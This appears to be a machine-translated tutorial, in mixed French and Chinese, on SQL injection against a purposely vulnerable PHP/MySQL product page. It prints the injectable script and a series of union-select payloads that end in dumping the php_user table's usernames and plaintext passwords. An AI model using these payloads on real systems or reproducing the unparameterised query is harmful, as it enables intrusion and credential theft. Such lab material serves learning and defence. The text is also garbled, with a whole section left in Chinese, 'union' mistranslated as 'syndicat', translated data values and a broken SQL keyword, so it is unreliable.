Un processus complet d'injection SQL en PHP

Le contenu de cet article est un processus complet d'injection SQL en PHP. Maintenant, je le partage avec tout le monde. Les amis dans le besoin peuvent s'y référer

Après avoir acquis quelques compétences en injection SQL. Voici une pratique simple de l'injection SQL pour PHP+MYSQL

Observez d'abord deux tables de données MYSQL

Table d'enregistrement utilisateur :

REATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
`userlevel` char(2) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');
INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');

Liste des enregistrements de produits :

CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default '',
`price` float NOT NULL default '0',
`img` varchar(200) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');

Le fichier suivant est show_product.php utilisé pour afficher la liste des produits. L'injection SQL exploite également la vulnérabilité de l'instruction SQL de ce fichier

<?php
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "数据库联接错误";
exit;
}
if (!mysql_select_db("phpsql")) {
echo "选择数据库出错" . mysql_error();
exit;
}
$tempID=$_GET[&#39;id&#39;];
if($tempID<=0 || !isset($tempID)) $tempID=1;
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.&#39;<br>&#39;;
$result = mysql_query($sql);
if (!$result) {
echo "查询出错" . mysql_error();
exit;
}
if (mysql_num_rows($result) == 0) {
echo "没有查询结果";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
echo &#39;ID:&#39;.$row["id"].&#39;<br>&#39;;
echo &#39;name:&#39;.$row["name"].&#39;<br>&#39;;
echo &#39;price:&#39;.$row["price"].&#39;<br>&#39;;
echo &#39;image:&#39;.$row["img"].&#39;<br>&#39;;
}
?>

Observez cette instruction : $sql = "SELECT * FROM php_product WHERE id =$tempID";

$tempID est obtenu à partir de $_GET. Nous pouvons construire la valeur de cette variable pour atteindre l'objectif de l'injection SQL

Construire respectivement les liens suivants :

1, http://localhost/phpsql/index.php?id=1

Obtenez le résultat suivant

SELECT * FROM php_product WHERE id =1 //当前执行的SQL语句

//Obtenir la liste d'informations sur le produit avec l'ID 1

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

2、 http://localhost/phpsql/index.php?id=1 or 1=1

得到输出

SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句

//一共两条产品资料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:2

name:name_2

price:35.25

image:images/name_2.jpg

1和2都得到资料列表输出，证明SQL语句执行成功

3、判断数据表字段数量

http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

得到输出

SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句

//一共两条记录，注意第二条的记录为全1，这是union select联合查询的结果。

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:1

name:1

price:1

image:1

4、判断数据表字段类型

http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)

得到输出

SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:0

name:A

price:0

image:A

注意第二条记录，如果后面的值等于A，说明这个字段与union查询后面构造的字段类型相符。此时union后面

为char(65)，表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型

5、大功告成，得到我们想要的东西：

http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

得到输出：

SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

//Sortie de deux informations utilisateur, le nom est le nom d'utilisateur, l'image est le mot de passe de l'utilisateur.

ID:1

nom:sept

prix:1

image:seven_pwd

ID:1

nom:swons

prix : 1

image:swons_pwd

Notez que l'ID=10000 dans l'URL ne sert pas à obtenir les informations sur le produit, mais uniquement pour obtenir les résultats de requête union suivants. Dans des situations plus pratiques, les valeurs de l'identifiant sont différentes

Le nom d'utilisateur et le mot de passe du syndicat doivent être placés aux positions 2 et 4. Ce n'est qu'ainsi qu'il pourra correspondre à l'instruction select précédente. C'est la caractéristique de la requête syndicale

déclaration

Remarque :

Cette simple injection La méthode est plus spécifique au contexte. En réalité, c'est plus compliqué que cela. Mais le principe est le même.

Recommandations associées :

Méthode de sécurité des données pour empêcher l'injection SQL en PHP

Exemple de méthode pour empêcher l'injection SQL en PHP

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!